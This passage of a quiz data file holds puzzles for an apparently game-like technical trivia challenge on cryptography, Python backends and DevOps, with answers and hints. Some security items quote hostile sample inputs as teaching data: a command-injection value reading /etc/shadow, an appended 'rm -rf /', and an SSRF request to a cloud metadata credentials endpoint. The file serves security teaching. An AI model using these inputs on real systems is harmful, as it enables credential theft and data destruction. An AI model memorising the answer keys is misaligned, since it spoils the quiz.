    difficulty: 'Intermediate',
    title: 'The Unsigned Algorithm None',
    scenario: 'Sector 2 blast door accepted an authentication token whose JOSE header specified algorithm "none", bypassing signature verification.',
    question: 'What ubiquitous JSON-based authentication token format comprises three Base64URL-encoded segments: Header, Payload, and Signature?',
    code_snippet: 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozG429...\n// WHAT COMPACT URL-SAFE TOKEN FORMAT IS THIS?',
    answer: ['jwt', 'json web token', 'json web tokens'],
    hint: 'Often pronounced like the English word "jot".',
    explanation: 'JSON Web Tokens (JWT) store signed claims. Failing to reject `alg: "none"` allows attackers to forge administrative payloads without valid signatures.',
    tags: ['security', 'jwt', 'tokens', 'authentication', 'crypto', 'sector-2'],
  },
  {
    id: '00000003-0000-4000-8000-000000000007',
    sector_level: 3,
    puzzle_slot: 7,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Asymmetric Handshake Shield',
    scenario: 'Coolant telemetry transmission was intercepted because the connection lacked mutual asymmetric cryptographic verification.',
    question: 'What cryptographic protocol (the successor to SSL) provides end-to-end encrypted transport, authentication, and integrity over TCP port 443?',
    code_snippet: '// Handshake: ClientHello -> ServerHello -> Certificate -> KeyExchange -> Finished\n// WHAT TRANSPORT SECURITY PROTOCOL IS THIS?',
    answer: ['tls', 'transport layer security', 'tls 1.3', 'tls/ssl', 'tls 1.2'],
    hint: 'Three letters, powers HTTPS in every modern web browser.',
    explanation: 'Transport Layer Security (TLS) encrypts network communications and verifies server identity via X.509 digital certificates.',
    tags: ['security', 'tls', 'https', 'cryptography', 'certificates', 'sector-3'],
  },
  {
    id: '00000003-0000-4000-8000-000000000008',
    sector_level: 3,
    puzzle_slot: 8,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Stack Canary Canary Warning',
    scenario: 'A legacy C firmware daemon in the reactor core used strcpy() on unbounded network input, overwriting instruction pointer registers.',
    question: 'What compiler defense places a random secret integer on the stack before the return address to detect and terminate buffer overflow attacks?',
    code_snippet: '// Function Stack: [Local Variables] -> [_______] -> [Saved Frame Pointer] -> [Return Address]\n// If overwritten, __stack_chk_fail terminates execution.',
    answer: ['stack canary', 'canary', 'stack canaries', 'canary value'],
    hint: 'Named after the bird miners took into coal mines to detect toxic gases.',
    explanation: 'Stack canaries detect memory corruption by checking whether a secret value immediately preceding the saved return address has been overwritten.',
    tags: ['security', 'buffer-overflow', 'canary', 'memory-safety', 'c-cpp', 'sector-3'],
  },
  {
    id: '00000003-0000-4000-8000-000000000009',
    sector_level: 4,
    puzzle_slot: 9,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Least Privilege Principle',
    scenario: 'A maintenance script running in the debug wing was granted full root AWS IAM privileges, allowing an anomaly exploit to delete the backup vaults.',
    question: 'What foundational security principle states that every program and user must operate using only the minimal set of privileges necessary to perform its job?',
    code_snippet: '// SECURITY AUDIT: Restrict service account from AdministratorAccess to s3:GetObject only.\n// WHAT PRINCIPLE DOES THIS ENFORCE?',
    answer: ['principle of least privilege', 'least privilege', 'polp', 'least privilege principle'],
    hint: 'Granting the "least" amount of "privilege" possible.',
    explanation: 'The Principle of Least Privilege limits damage from compromised components by ensuring entities only hold permissions strictly essential to their role.',
    tags: ['security', 'least-privilege', 'iam', 'zero-trust', 'access-control', 'sector-4'],
  },
  {
    id: '00000003-0000-4000-8000-000000000010',
    sector_level: 4,
    puzzle_slot: 10,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Microsecond Leak Vector',
    scenario: 'An authentication endpoint verified HMAC signatures using standard == string comparison, leaking secret length and prefix via microsecond timing differences.',
    question: 'What function or comparison technique must be used when comparing cryptographic hashes to ensure comparison time is independent of input characters?',
    code_snippet: '// VULNERABLE: return userHash === expectedHash; // Early return on first mismatch!\n// SECURE: return crypto.________________(userBuffer, expectedBuffer);',
    answer: ['timingsafeequal', 'constant time comparison', 'constant-time comparison', 'crypto.timingsafeequal'],
    hint: 'A comparison that runs in "constant time" or is "timing safe".',
    explanation: 'Constant-time comparisons prevent side-channel timing attacks by checking every byte regardless of whether an early byte failed.',
    tags: ['security', 'timing-attacks', 'side-channel', 'cryptography', 'hmac', 'sector-4'],
  },
  {
    id: '00000003-0000-4000-8000-000000000011',
    sector_level: 4,
    puzzle_slot: 11,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Arbitrary Shell Execution',
    scenario: 'Containment gate diagnostics ran child_process.exec("ping " + host), allowing attackers to append "; rm -rf /" to execute arbitrary OS commands.',
    question: 'What vulnerability category allows untrusted user input to break out of command strings and execute arbitrary operating system instructions?',
    code_snippet: '// Input: "127.0.0.1 && cat /etc/shadow"\n// Command: exec("traceroute " + input);\n// WHAT VULNERABILITY IS THIS?',
    answer: ['command injection', 'os command injection', 'shell injection'],
    hint: 'Injecting shell commands into the operating system.',
    explanation: 'Command Injection occurs when input containing shell metacharacters (;, &&, |) is evaluated by system shells rather than isolated argument arrays.',
    tags: ['security', 'command-injection', 'rce', 'owasp', 'subprocess', 'sector-4'],
  },
  {
    id: '00000003-0000-4000-8000-000000000012',
    sector_level: 5,
    puzzle_slot: 12,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Metadata Impersonation Barrier',
    scenario: 'The nexus webhook system fetches user-provided URLs. An attacker entered http://169.254.169.254 to exfiltrate temporary cloud instance credentials.',
    question: 'What attack class tricks a server into issuing unauthorized HTTP requests to internal network services and cloud metadata APIs?',
    code_snippet: '// Attacker triggers: POST /webhook/test { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }\n// WHAT OWASP VULNERABILITY IS THIS?',
    answer: ['ssrf', 'server-side request forgery', 'server side request forgery'],
    hint: 'Server-Side Request Forgery.',
    explanation: 'SSRF allows attackers to abuse server network trust to query internal ports, loopback interfaces, and cloud metadata endpoints.',
    tags: ['security', 'ssrf', 'cloud-security', 'metadata', 'owasp', 'sector-5'],
  },
  {
    id: '00000003-0000-4000-8000-000000000013',
    sector_level: 5,
    puzzle_slot: 13,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Advanced',
    title: 'The Ephemeral Key Secrecy',
    scenario: 'An adversary recorded past encrypted traffic sessions. If the facility master private key is stolen, all past historical sessions could be decrypted.',
    question: 'What cryptographic property ensures that the compromise of a long-term private key does NOT compromise past session keys generated with ephemeral Diffie-Hellman?',
    code_snippet: '// DHE / ECDHE generates unique temporary session keys per handshake.\n// Past captured sessions remain un-decryptable.\n// WHAT PROPERTY IS THIS?',
    answer: ['perfect forward secrecy', 'forward secrecy', 'pfs'],
    hint: 'Guarantees secrecy going "forward" in time.',
    explanation: 'Perfect Forward Secrecy (PFS) ensures each session uses unique ephemeral key pairs that are discarded after the session terminates.',
    tags: ['security', 'diffie-hellman', 'pfs', 'forward-secrecy', 'cryptography', 'sector-5'],
  },
  {
    id: '00000003-0000-4000-8000-000000000014',
    sector_level: 5,
    puzzle_slot: 14,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Expert',
    title: 'The Zero-Knowledge Extraction Gate',
    scenario: 'The final gateway demands proof that you possess the master containment passphrase without ever transmitting or revealing any bits of the secret.',
    question: 'What cryptographic proof protocol enables a prover to mathematically convince a verifier that a statement is true with zero disclosure of underlying private data?',
    code_snippet: '// Prover demonstrates knowledge of secret S where Hash(S) = H\n// Verifier confirms validity without learning S.\n// WHAT CRYPTOGRAPHIC PROOF CLASS IS THIS?',
    answer: ['zero-knowledge proof', 'zero knowledge proof', 'zkp', 'zk-snark', 'zero knowledge'],
    hint: 'You prove truth while imparting "zero knowledge" of the secret.',
    explanation: 'Zero-Knowledge Proofs (ZKPs) allow mathematical verification of statements or authorizations without exposing the underlying confidential information.',
    tags: ['security', 'zero-knowledge', 'zkp', 'zk-snark', 'cryptography', 'sector-5'],
  },

  // =========================================================================
  // DOMAIN 4: Python & Backend Systems (14 Puzzles)
  // =========================================================================
  {
    id: '00000004-0000-4000-8000-000000000001',
    sector_level: 1,
    puzzle_slot: 1,
    domain: 'Python & Backend Systems',
    difficulty: 'Easy',
    title: 'The Colon Suite Delimiter',
    scenario: 'The laboratory environment script failed to compile due to a missing structural delimiter before an indented code block.',
    question: 'In Python, what single punctuation character must appear at the end of a def, if, for, or while statement line to introduce an indented suite?',
    code_snippet: 'def verify_clearance(operator_id) # WHAT CHARACTER IS MISSING HERE?\n    return operator_id.startswith("OP_")',
    answer: [':', ': ', 'colon', 'a colon'],
    hint: 'Two dots stacked vertically.',
    explanation: 'In Python syntax, a colon (:) is the required token at the end of header lines that open an indented block of statements.',
    tags: ['python', 'syntax', 'backend', 'primitives', 'sector-1'],
  },
  {
    id: '00000004-0000-4000-8000-000000000002',
    sector_level: 1,
    puzzle_slot: 2,
    domain: 'Python & Backend Systems',
    difficulty: 'Easy',
    title: 'The Non-Blocking Event Yield',
    scenario: 'The backend web server froze because a synchronous time.sleep() blocked the entire single-threaded asyncio event loop.',
    question: 'In Python asyncio, what keyword is used inside async def functions to pause execution until an asynchronous Task or Future resolves?',
    code_snippet: 'async def fetch_telemetry():\n    data = _____ async_http_client.get("/sensors") # WHAT KEYWORD SUSPENDS EXECUTION?\n    return data',
    answer: ['await', 'await '],
    hint: 'You "await" the result of a promise or task.',
    explanation: 'The `await` keyword yields execution back to the asyncio event loop while waiting for asynchronous I/O operations to complete.',
    tags: ['python', 'asyncio', 'await', 'concurrency', 'event-loop', 'sector-1'],
  },
  {
    id: '00000004-0000-4000-8000-000000000003',
    sector_level: 1,
    puzzle_slot: 3,
    domain: 'Python & Backend Systems',
    difficulty: 'Easy',
    title: 'The Resource Leak Sanctuary',
    scenario: 'Sector 1 exit logged fatal "Too many open files" OS exceptions because file descriptors were never closed during exception handling.',
    question: 'What Python statement provides deterministic resource cleanup by automatically executing __enter__ and __exit__ methods on context managers?',
    code_snippet: '____ open("containment.log", "r") as stream:\n    telemetry = stream.read()\n# File is guaranteed closed here even if exceptions arise',
    answer: ['with', 'with ', 'with statement', 'the with statement'],
    hint: 'A 4-letter English word starting with "w".',
    explanation: 'The `with` statement guarantees cleanup of system resources (files, sockets, database locks) even when unexpected exceptions are raised.',
    tags: ['python', 'context-managers', 'with', 'resources', 'file-handling', 'sector-1'],
  },
  {
    id: '00000004-0000-4000-8000-000000000004',
    sector_level: 2,
    puzzle_slot: 4,
    domain: 'Python & Backend Systems',
    difficulty: 'Intermediate',
    title: 'The Memory-Efficient Stream',
    scenario: 'The server rack ran out of RAM (OOM kill) trying to load a 10GB telemetry file into a single in-memory Python list.',
    question: 'Which Python keyword turns a normal function into a generator that evaluates and yields items lazily one at a time?',
    code_snippet: 'def stream_anomalies(log_file):\n    for line in log_file:\n        _____ line.strip() # WHAT KEYWORD PRODUCES VALUES LAZILY?',
    answer: ['yield', 'yield '],
    hint: 'Instead of "return", generators use this 5-letter word.',
    explanation: 'The `yield` keyword saves the local execution state of a generator, streaming items on demand with O(1) memory overhead.',
    tags: ['python', 'generators', 'yield', 'iterators', 'memory', 'sector-2'],
  },
  {
    id: '00000004-0000-4000-8000-000000000005',
    sector_level: 2,
    puzzle_slot: 5,
    domain: 'Python & Backend Systems',
    difficulty: 'Intermediate',
    title: 'The Idempotent Replacement Method',
    scenario: 'A network retry caused an API client to duplicate inventory items because it used POST instead of an idempotent full replacement method.',
    question: 'Which standard HTTP verb is designated by REST architecture for completely replacing a target resource idempotently?',
    code_snippet: '// Method where making 1 request or 10 identical requests leaves the server in the exact same state:\n// WHAT HTTP VERB IS THIS?',
    answer: ['put', 'PUT'],
    hint: 'Three letters, rhymes with "cut".',
    explanation: 'PUT is idempotent by HTTP specification: sending multiple identical PUT requests produces the exact same final resource state as one.',
    tags: ['python', 'rest-api', 'http-methods', 'idempotency', 'backend', 'sector-2'],
  },
  {
    id: '00000004-0000-4000-8000-000000000006',
    sector_level: 2,
    puzzle_slot: 6,
    domain: 'Python & Backend Systems',
    difficulty: 'Intermediate',
    title: 'The Metaprogramming Wrapper',
    scenario: 'Authentication and timing checks were duplicated across 30 FastAPI endpoints instead of wrapping them in reusable syntactic decorators.',
    question: 'What syntactic symbol precedes a Python decorator function when applying it to modify or wrap a function definition?',
    code_snippet: '_require_auth\n_measure_latency\ndef reboot_reactor():\n    return {"status": "rebooting"}\n# WHAT CHARACTER PREFIXES THE DECORATOR NAMES?',
    answer: ['@', '@ '],
    hint: 'The "at" sign used in email addresses.',
    explanation: 'The `@` symbol is syntactic sugar in Python for wrapping a function with another callable (e.g. `func = decorator(func)`).',
    tags: ['python', 'decorators', 'metaprogramming', 'functions', 'sector-2'],
  },
  {
    id: '00000004-0000-4000-8000-000000000007',
    sector_level: 3,
    puzzle_slot: 7,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The ACID Isolation Guarantee',
    scenario: 'During a database crash midway through a financial credit transfer, money was debited but never credited because of a missing transaction wrapper.',
    question: 'In the ACID database guarantees, which property ensures that a transaction is treated as a single indivisible unit that either completely succeeds or completely fails?',
    code_snippet: '// ACID: [?], Consistency, Isolation, Durability\n// WHAT PROPERTY GUARANTEES ALL-OR-NOTHING EXECUTION?',
    answer: ['atomicity', 'atomic'],
    hint: 'Derived from "atom", meaning indivisible.',
    explanation: 'Atomicity ensures that if any operation within a transaction fails, the entire transaction is rolled back, leaving state clean.',
    tags: ['python', 'acid', 'transactions', 'databases', 'sql', 'sector-3'],
  },
  {
    id: '00000004-0000-4000-8000-000000000008',
    sector_level: 3,
    puzzle_slot: 8,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The Global Interpreter Lock',
    scenario: 'Running four CPU-bound cryptographic cracking threads in Python only utilized 1 CPU core at 100% due to CPython\'s internal mutex.',
    question: 'What is the acronym for the mutex mechanism in CPython that prevents multiple native threads from executing Python bytecodes simultaneously?',
    code_snippet: '// Multi-threaded CPU-bound programs in CPython are constrained by this 3-letter lock.\n// WHAT IS ITS ACRONYM?',
    answer: ['gil', 'the gil', 'global interpreter lock'],
    hint: 'Global Interpreter Lock.',
    explanation: 'The GIL (Global Interpreter Lock) synchronizes access to Python objects, restricting multi-threaded execution of Python bytecode to a single core.',
    tags: ['python', 'gil', 'concurrency', 'multithreading', 'cpython', 'sector-3'],
  },
  {
    id: '00000004-0000-4000-8000-000000000009',
    sector_level: 4,
    puzzle_slot: 9,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The Distributed In-Memory Cache',
    scenario: 'Postgres query latency skyrocketed to 5 seconds under heavy load. A fast in-memory key-value store was deployed to cache hot session data.',
    question: 'What popular open-source, in-memory data structure store is widely used as a distributed database cache and message broker?',
    code_snippet: 'import redis\nclient = redis.Redis(host="localhost", port=6379)\nclient.setex("session:user_101", 3600, "{...}") # WHAT CACHE SYSTEM IS THIS?',
    answer: ['redis', 'redis-server'],
    hint: 'Remote Dictionary Server.',
    explanation: 'Redis stores key-value structures in RAM, providing sub-millisecond read/write operations ideal for caching and distributed locks.',
    tags: ['python', 'redis', 'caching', 'performance', 'in-memory', 'sector-4'],
  },
  {
    id: '00000004-0000-4000-8000-000000000010',
    sector_level: 4,
    puzzle_slot: 10,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The Adaptive Work Factor',
    scenario: 'The debug wing auth service used standard SHA-256 for password hashing. GPUs cracked 1 billion guesses per second.',
    question: 'Which password hashing function uses an adjustable cost/work factor to deliberately slow down computation and resist hardware cracking?',
    code_snippet: 'import bcrypt\nhashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))\n# WHAT PASSWORD HASHING ALGORITHM IS THIS?',
    answer: ['bcrypt', 'argon2', 'argon2id', 'pbkdf2'],
    hint: 'Starts with the letter "b", designed by Niels Provos and David Mazières.',
    explanation: 'bcrypt is a key derivation function with an adjustable cost factor that scales difficulty as computer hardware speeds increase.',
    tags: ['python', 'bcrypt', 'passwords', 'security', 'key-derivation', 'sector-4'],
  },
  {
    id: '00000004-0000-4000-8000-000000000011',
    sector_level: 4,
    puzzle_slot: 11,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The Throttling Bucket Drain',
    scenario: 'Rogue bots hammered the anomaly alert endpoint with 10,000 requests per minute, starving legitimate operator traffic.',
    question: 'What HTTP status code must an API return when a client has exceeded its designated rate limit quota?',
    code_snippet: '// HTTP/1.1 ___ Too Many Requests\n// Retry-After: 60\n// WHAT 3-DIGIT STATUS CODE GOES HERE?',
    answer: ['429', '429 too many requests', 'http 429'],
    hint: 'Client error status code starting with 4, in the twenties.',
    explanation: 'HTTP status 429 Too Many Requests informs the client that it has exceeded rate limiting thresholds and indicates when it may retry.',
    tags: ['python', 'rate-limiting', 'http-status', 'apis', 'backend', 'sector-4'],
  },
  {
    id: '00000004-0000-4000-8000-000000000012',
    sector_level: 5,
    puzzle_slot: 12,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The Bidirectional Socket Stream',
    scenario: 'HTTP polling added 800ms latency to real-time quantum telemetry. The system was upgraded to persistent full-duplex TCP connections.',
    question: 'Which protocol, upgraded over standard HTTP via status 101, provides persistent, low-latency, two-way communication channels over a single TCP socket?',
    code_snippet: '// Request: Upgrade: websocket / Connection: Upgrade\n// Response: HTTP/1.1 101 Switching Protocols\n// WHAT PROTOCOL IS THIS?',
    answer: ['websocket', 'websockets', 'ws'],
    hint: 'WebSockets.',
    explanation: 'WebSockets enable bidirectional, full-duplex communication with minimal frame overhead after an initial HTTP handshake.',
    tags: ['python', 'websockets', 'real-time', 'networking', 'tcp', 'sector-5'],
  },
  {
    id: '00000004-0000-4000-8000-000000000013',
    sector_level: 5,
    puzzle_slot: 13,
    domain: 'Python & Backend Systems',
    difficulty: 'Advanced',
    title: 'The B-Tree Index Traversal',
    scenario: 'Querying 50 million records took 14 seconds because Postgres performed a sequential full table scan on an un-indexed column.',
    question: 'What SQL command is used to inspect how the database query planner executes a query, revealing whether it uses an index scan or table scan?',
    code_snippet: '_______ ANALYZE SELECT * FROM telemetry WHERE sensor_uuid = "a1-94";\n// WHAT KEYWORD INSTRUCTS THE PLANNER TO OUTPUT ITS EXECUTION PLAN?',
    answer: ['explain', 'explain analyze', 'explain '],
    hint: 'Ask the database to "explain" its query execution plan.',
    explanation: '`EXPLAIN ANALYZE` returns the execution plan of a query along with actual execution timings and cost estimates.',
    tags: ['python', 'sql', 'postgres', 'indexes', 'optimization', 'sector-5'],
  },
  {
    id: '00000004-0000-4000-8000-000000000014',
    sector_level: 5,
    puzzle_slot: 14,
    domain: 'Python & Backend Systems',
    difficulty: 'Expert',
    title: 'The Poison Message Quarantine',
    scenario: 'A malformed payload in the Kafka telemetry stream continuously crashed consumer workers upon processing, blocking the entire queue partition.',
    question: 'In message queue and event streaming architectures, what specialized queue receives and isolates unprocessable or failed messages for manual inspection?',
    code_snippet: '// Failed after 5 retries -> Forward message to: ________ Queue (DLQ)\n// WHAT IS THE FULL NAME OF THIS QUARANTINE QUEUE?',
    answer: ['dead letter queue', 'dead-letter queue', 'dead letter', 'dlq'],
    hint: 'A "dead letter" office where undeliverable mail is kept.',
    explanation: 'A Dead Letter Queue (DLQ) isolates poison-pill messages so they do not block standard pipeline processing or cause infinite retry loops.',
    tags: ['python', 'message-queues', 'kafka', 'dlq', 'microservices', 'sector-5'],
  },

  // =========================================================================
  // DOMAIN 5: DevOps & Cloud Infrastructure (14 Puzzles)
  // =========================================================================
  {
    id: '00000005-0000-4000-8000-000000000001',
    sector_level: 1,
    puzzle_slot: 1,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Easy',
    title: 'The Foundational Image Blueprint',
    scenario: 'The laboratory deployment script failed to build a container because the base operating system image was never declared.',
    question: 'What initial instruction in a Dockerfile specifies the base parent container image from which the new container build starts?',
    code_snippet: '____ node:20-alpine # WHAT INSTRUCTION SPECIFIES THE BASE IMAGE?\nWORKDIR /app\nCOPY . .\nRUN npm install\nCMD ["node", "server.js"]',
    answer: ['from', 'FROM', 'from '],
    hint: 'Where the container image originates "from".',
    explanation: 'The `FROM` directive initializes a new build stage and sets the base image for subsequent Dockerfile instructions.',
    tags: ['devops', 'docker', 'dockerfile', 'containers', 'sector-1'],
  },
  {
    id: '00000005-0000-4000-8000-000000000002',
    sector_level: 1,
    puzzle_slot: 2,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Easy',
    title: 'The Container Ingress Bridge',
    scenario: 'A Node.js server inside a Docker container listens on port 3000, but host machine browsers cannot connect to it.',
    question: 'Which Docker CLI flag maps a host machine port to a container port during "docker run" (e.g. -p host_port:container_port)?',
    code_snippet: 'docker run -d _ 8080:3000 abyss-sentinel # WHAT SINGLE-LETTER FLAG MAPS PORTS?',
    answer: ['-p', '--publish', '-p ', '-P'],
    hint: 'Short for publish or port.',
    explanation: 'The `-p host:container` flag publishes a container\'s internal port to the host system\'s network interface.',
    tags: ['devops', 'docker', 'networking', 'ports', 'containers', 'sector-1'],
  },
  {
    id: '00000005-0000-4000-8000-000000000003',
    sector_level: 1,
    puzzle_slot: 3,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Intermediate',
    title: 'The Bloated Compiler Purge',
    scenario: 'The production container image size is 2.4 GB because the Go compiler and build dependencies were left inside the final shipping layer.',
    question: 'What Dockerfile pattern uses multiple FROM statements to compile code in a temporary builder stage and copy only binaries to a slim runtime image?',
    code_snippet: 'FROM golang:1.22 AS builder\nRUN go build -o /app .\n\n# WHAT PATTERN TRANSFERS ARTIFACTS TO A FRESH STAGE?\nFROM alpine:3.19\nCOPY --from=builder /app /app',
    answer: ['multi-stage build', 'multi stage build', 'multistage build', 'multi-stage builds', 'multi-stage'],
    hint: 'Building an image in "multiple stages".',
    explanation: 'Multi-stage Docker builds separate build-time toolchains from the final runtime environment, drastically reducing image size and attack surface.',
    tags: ['devops', 'docker', 'multi-stage', 'optimization', 'security', 'sector-1'],
  },
  {
    id: '00000005-0000-4000-8000-000000000004',
    sector_level: 2,
    puzzle_slot: 4,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Intermediate',
    title: 'The Atomic Compute Unit',
    scenario: 'The Kubernetes scheduler failed to deploy a raw container directly because Kubernetes orchestrates containers wrapped in a higher-level atomic abstraction.',
    question: 'What is the smallest deployable atomic computing unit in Kubernetes, representing a single instance of a running process in a cluster?',
    code_snippet: 'apiVersion: v1\nkind: ___\nmetadata:\n  name: anomaly-sensor\nspec:\n  containers:\n  - name: probe\n    image: abyss/probe:v1',
    answer: ['pod', 'Pod', 'a pod', 'pods'],
    hint: 'A pod of peas or a pod of whales.',
    explanation: 'A Pod is the fundamental execution unit in Kubernetes, encapsulating one or more tightly coupled containers sharing network and storage.',
    tags: ['devops', 'kubernetes', 'k8s', 'pods', 'orchestration', 'sector-2'],
  },
  {
    id: '00000005-0000-4000-8000-000000000005',
    sector_level: 2,
    puzzle_slot: 5,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Intermediate',
    title: 'The Resilient Virtual IP Bridge',
    scenario: 'Pods are ephemeral and get replaced with new IP addresses on every restart, breaking client connections.',
    question: 'Which Kubernetes resource abstraction provides a stable virtual IP and DNS name to load-balance traffic across a dynamic set of Pods?',
    code_snippet: 'apiVersion: v1\nkind: _______\nmetadata:\n  name: core-service\nspec:\n  type: ClusterIP\n  selector:\n    app: core-api',
    answer: ['service', 'Service', 'k8s service', 'services'],
    hint: 'ClusterIP, NodePort, and LoadBalancer are variants of this resource.',
    explanation: 'A Kubernetes Service defines a logical set of Pods and a policy to route network traffic to them via stable cluster IPs and DNS records.',
    tags: ['devops', 'kubernetes', 'services', 'networking', 'k8s', 'sector-2'],
  },
  {
    id: '00000005-0000-4000-8000-000000000006',
    sector_level: 2,
    puzzle_slot: 6,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Intermediate',
    title: 'The Declarative State Anchor',
    scenario: 'Server configurations drifted across clusters due to manual changes made in cloud web dashboards, causing blast door locks to desynchronize.',
    question: 'What popular open-source Infrastructure as Code (IaC) tool by HashiCorp uses declarative HCL files to provision and manage cloud infrastructure?',
    code_snippet: 'resource "aws_s3_bucket" "containment_logs" {\n  bucket = "abyss-containment-2026"\n}\n// WHAT INFRASTRUCTURE AS CODE TOOL PROCESSES THIS HCL SPEC?',
    answer: ['terraform', 'opentofu', 'hashicorp terraform'],
    hint: 'Derived from "terra" (earth) and "form".',
    explanation: 'Terraform codifies cloud infrastructure into version-controlled declarative configuration files, ensuring reproducible deployments.',
    tags: ['devops', 'terraform', 'iac', 'hcl', 'cloud-provisioning', 'sector-2'],
  },
  {
    id: '00000005-0000-4000-8000-000000000007',
    sector_level: 3,
    puzzle_slot: 7,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Deadlock Liveness Probe',
    scenario: 'A reactor monitoring container entered an internal thread deadlock. It was still running from Docker\'s perspective, so Kubernetes never restarted it.',
    question: 'Which Kubernetes health probe diagnostic periodically tests a container to determine whether the container needs to be killed and restarted?',
    code_snippet: 'spec:\n  containers:\n  - name: core\n    _____________:\n      httpGet:\n        path: /healthz\n        port: 8080\n      initialDelaySeconds: 5',
    answer: ['livenessprobe', 'liveness probe', 'livenessProbe'],
    hint: 'Tests whether the application is still "live".',
    explanation: 'A livenessProbe detects application deadlocks or unrecoverable freezes, prompting the kubelet to restart the container automatically.',
    tags: ['devops', 'kubernetes', 'probes', 'liveness', 'reliability', 'sector-3'],
  },
  {
    id: '00000005-0000-4000-8000-000000000008',
    sector_level: 3,
    puzzle_slot: 8,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Pipeline Dependency Cache',
    scenario: 'Every GitHub Actions workflow run took 12 minutes because 800MB of npm dependencies were re-downloaded from scratch on every commit.',
    question: 'What GitHub Actions standard action allows caching package manager dependencies across workflow runs to accelerate CI execution?',
    code_snippet: '- name: Cache Node modules\n  uses: actions/_____@v4\n  with:\n    path: ~/.npm\n    key: ${{ runner.os }}-node-${{ hashFiles("**/package-lock.json") }}',
    answer: ['cache', 'actions/cache', 'cache@v4'],
    hint: 'A system for storing dependencies for quick retrieval.',
    explanation: 'The `actions/cache` GitHub Action caches directories matching a key, avoiding redundant dependency downloads in continuous integration pipelines.',
    tags: ['devops', 'ci-cd', 'github-actions', 'caching', 'automation', 'sector-3'],
  },
  {
    id: '00000005-0000-4000-8000-000000000009',
    sector_level: 4,
    puzzle_slot: 9,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Cold Start Inversion',
    scenario: 'Debug wing emergency serverless lambdas suffered 3-second cold start delays because large container runtimes had to spin up on demand.',
    question: 'In serverless computing (e.g. AWS Lambda), what term describes the latency delay incurred when an idle function instance initializes a new execution environment?',
    code_snippet: '// Request received -> New container booted -> Runtime downloaded -> Code loaded\n// WHAT IS THIS INITIALIZATION LATENCY CALLED?',
    answer: ['cold start', 'cold-start', 'a cold start'],
    hint: 'The opposite of a "warm" invocation.',
    explanation: 'A cold start occurs when an event triggers a serverless function that has no pre-warmed execution container ready, adding initialization latency.',
    tags: ['devops', 'serverless', 'lambda', 'cloud', 'cold-start', 'sector-4'],
  },
  {
    id: '00000005-0000-4000-8000-000000000010',
    sector_level: 4,
    puzzle_slot: 10,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Time-Series PromQL Vector',
    scenario: 'Monitoring telemetry panels in Grafana need to calculate the per-second rate of HTTP 500 errors over the last 5 minutes.',
    question: 'What query language is used by the Prometheus monitoring system to aggregate and query time-series dimensional metrics?',
    code_snippet: 'rate(http_requests_total{status="500"}[5m])\n// WHAT METRIC QUERY LANGUAGE IS THIS?',
    answer: ['promql', 'promql query', 'prometheus query language'],
    hint: 'Prometheus Query Language.',
    explanation: 'PromQL (Prometheus Query Language) provides operators and functions (like `rate()`, `histogram_quantile()`) for querying dimensional time-series data.',
    tags: ['devops', 'prometheus', 'promql', 'monitoring', 'observability', 'sector-4'],
  },
  {
    id: '00000005-0000-4000-8000-000000000011',
    sector_level: 4,
    puzzle_slot: 11,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Declarative GitOps Reconciler',
    scenario: 'Manual `kubectl apply` commands caused cluster state to diverge from git repository source code.',
    question: 'What popular declarative GitOps continuous delivery tool for Kubernetes continuously compares cluster live state with git repository manifests?',
    code_snippet: 'apiVersion: argoproj.io/v1alpha1\nkind: Application\nmetadata:\n  name: abyss-core\nspec:\n  syncPolicy:\n    automated: {}\n// WHAT GITOPS CD TOOL USES THIS SPEC?',
    answer: ['argocd', 'argo cd', 'argo-cd'],
    hint: 'A mythological ship named Argo.',
    explanation: 'ArgoCD is a declarative GitOps controller for Kubernetes that automatically detects configuration drift and synchronizes live cluster state with Git.',
    tags: ['devops', 'gitops', 'argocd', 'cd', 'k8s', 'sector-4'],
  },
  {
    id: '00000005-0000-4000-8000-000000000012',
    sector_level: 5,
    puzzle_slot: 12,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Rootless Container Shield',
    scenario: 'A container breakout exploit compromised the host kernel because the containerized Node.js process ran under UID 0 (root).',
    question: 'What Dockerfile directive switches the active execution user to a non-privileged user to harden the container against privilege escalation?',
    code_snippet: 'RUN adduser -D -u 1000 appuser\n____ appuser # WHAT DIRECTIVE SWITCHES THE USER AWAY FROM ROOT?\nCMD ["node", "server.js"]',
    answer: ['user', 'USER', 'USER '],
    hint: 'The word "USER" in a Dockerfile.',
